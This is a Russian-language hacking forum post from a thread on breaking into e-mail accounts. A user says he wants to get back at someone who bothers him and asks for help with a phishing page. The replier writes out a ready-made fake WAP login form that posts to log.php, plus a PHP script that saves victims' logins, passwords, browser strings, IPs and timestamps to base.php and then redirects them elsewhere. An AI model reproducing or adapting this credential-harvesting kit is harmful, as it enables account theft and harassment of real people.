Несколько способов взлома e-mail аккаунтов

#12

29.06.2009, 13:46

L I G A

Постоянный

Регистрация: 27.07.2008

Сообщений: 614

Провел на форуме:
4532332

Репутация: 1196

Отправить сообщение для L I G A с помощью ICQ

Цитата:

Сообщение от Shark_d

Здравствуйте, уважаемые!
Сразу оговорюсь, что я не хаккер, не кодер и пр. и вообще мало в этом разбираюсь. Но! достал меня один г....н и ничего не остается делать, как попытаться "успокоить" его. Но ближе к сути вопроса:
По способу №1 (фейковая страница авторизации). Насколько я понял, способ может сработать не только на мыле, а на любой страничке авторизации пользователя? Так вот, ткните носом, куда подставить адрес моего скрипта "log.php" в данном коде?

PHP код:


		
			
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE wml PUBLIC "-//WAPFORUM//DTD WML 1.2//EN" "http://www.wapforum.org/DTD/wml12.dtd">

<wml>

<head>

<meta http-equiv="Cache-Control" content="no-cache"/>

<meta http-equiv="Cache-Control" content="max-age=0"/>

<meta http-equiv="Cache-Control" content="must-revalidate"/>

<meta http-equiv="Expires" content="Tue, 01 Jan 1970 00:00:00 GMT"/>

</head><card id="main" title="Авторизация">

<p align="center">

Логин:<br/>

<input type="text" name="login9660" maxlength="16"/><br/>

Пароль:<br/>

<input type="password" name="pass9660" maxlength="30"/><br/>

Привязка к IP/браузер:<br/>

<select name="checkIB9660" ivalue="1"><option value="1">вкл.</option><option value="0">выкл</option></select><br/>

<anchor>войти<go href="/auth.php" method="post"><postfield name="login" value="$(login9660)"/><postfield name="pass" value="$(pass9660)"/><postfield name="checkIB" value="$(checkIB9660)"/><postfield name="url" value="/account.php?"/><postfield name="PHPSESSID" value="nmcd6rs62et5q84j0seocodi25"/></go></anchor><br/>

<a href="/?PHPSESSID=nmcd6rs62et5q84j0seocodi25">на главную</a>

</p>

</card>

</wml>

Заранее благодарен

там у тебя нет тега форм как все привыкли что в нем должен указыватся action,и нет сабмита а есть хреф ,вот написал тебе говтовый фэйк

PHP код:


		
			
<!DOCTYPE wml PUBLIC "-//WAPFORUM//DTD WML 1.2//EN" "http://www.wapforum.org/DTD/wml12.dtd">

<wml>

<head>

<meta http-equiv="Cache-Control" content="no-cache"/>

<meta http-equiv="Cache-Control" content="max-age=0"/>

<meta http-equiv="Cache-Control" content="must-revalidate"/>

<meta http-equiv="Expires" content="Tue, 01 Jan 1970 00:00:00 GMT"/>

</head><card id="main" title="Авторизация">

<FORM name=remove ACTION='log.php' METHOD='POST' ENCTYPE='application/x-

www-form-urlencoded'>

<p align="center">

Логин:<br/>

<input type="text" name="login9660" maxlength="16"/><br/>

Пароль:<br/>

<input type="password" name="pass9660" maxlength="30"/><br/>

Привязка к IP/браузер:<br/>

<select name="checkIB9660" ivalue="1"><option value="1">вкл.</option><option value="0">выкл</option></select><br/>

<a href="javascript:document.remove.submit()">войти</a><br></form>

<a href="index.php">на главную</a>

</p>

</card>

</wml>

log.php

PHP код:


		
			
<?php

if($login9660 and $pass9660!==0){

$Browser = getenv("HTTP_USER_AGENT");

$ip = $_SERVER["REMOTE_ADDR"];

$Data = date("d-m-y H:i:s", time());

$log= "login:$login9660 |pass:$pass9660 |$Browser |$ip |$Data|||";

$filelog = fopen("base.php","a+");

fwrite($filelog,"\n $log \n");

fclose($filelog);

}

header('Location: http://google.com');//перепишешь адрес

?>

логи пишутся в base.php

ANTICHAT — форум по информационной безопасности, OSINT и технологиям